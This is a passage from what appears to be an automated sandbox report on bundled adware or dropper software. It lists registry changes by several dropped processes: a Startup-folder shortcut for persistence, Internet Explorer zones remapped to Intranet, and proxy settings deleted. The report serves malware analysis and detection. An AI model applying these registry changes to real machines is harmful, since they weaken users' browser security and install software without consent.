\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\2.jpg, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\25.png, , \??\C:\DOCUME~1\adm0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process OfficeAssist.0195.80.1015.exe:448 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Kingsoft\WpsAssist\Common]
"Version" = "1.0.0.0195"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Kingsoft\WpsAssist\Common]
"infoGUID" = "{96D8A049-9608-479F-9CD4-9401117A35B9}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\WpsAssist]
"DisplayName" = "文档美化大师"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Start Menu\Programs\Startup\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Start Menu\Programs\Startup\速捷搜索.lnk, \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\1.png,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\WpsAssist]
"DisplayVersion" = "1.0.0.0195"
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\utility\uninst.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"Version" = "2.5"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist]
"assistupdate.exe" = "Assistant Expansion tool"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\WpsAssist]
"LocationRoot" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Kingsoft\WpsAssist\Common]
"DistSrc" = "80.1015"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\WpsAssist]
"Publisher" = "Kingsoft Corp."
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC A9 D8 22 C5 51 D1 AA B8 89 33 42 3A 77 B9 4D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\HELPDIR]
"(Default)" = "%Program Files%\Common Files\Microsoft Shared\OFFICE14"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\WpsAssist]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\utility\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp]
"OfficeAssist.0195.80.1015.exe" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"(Default)" = "{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process fm4svr.exe:3608 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 2C 52 55 51 07 9F E7 67 93 09 8D 4C 2D 11 50"
The process fm4svr.exe:1392 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 F2 26 D3 49 52 82 40 FB CB A7 7B FA C1 CF E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process fjwyusp.exe:1336 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"a-zm-157391-v5.exe" = "a-zm-157391-v5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"IFoxInstall-y-c203945859-run-s-x.exe" = "SHOnlineInstall Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"xkcc_50091167828.exe" = "安装文件"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"axult.exe" = "axult"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 04 73 F2 EC 13 C6 CE 4E B0 BE 25 1D A7 94 17"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"setup_2948-140896.exe" = "FM4.0安装程序"
"axuls.exe" = "axuls"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process axuls.exe:1160 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 C0 62 B1 41 4C EF E0 B6 C3 69 69 AF F8 01 81"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ignite.exe:2576 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 40 3B 45 63 A0 34 86 04 D9 A6 99 93 92 E9 A6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ignite.exe:2880 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA E9 04 92 BE 57 E4 23 7D 44 4B 41 73 A5 45 90"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%System%\config\systemprofile\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%System%\config\systemprofile\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files"
The process ignite.exe:2764 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 92 71 BB 4F C3 9F 7D 2F 02 55 E3 09 44 22 8A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
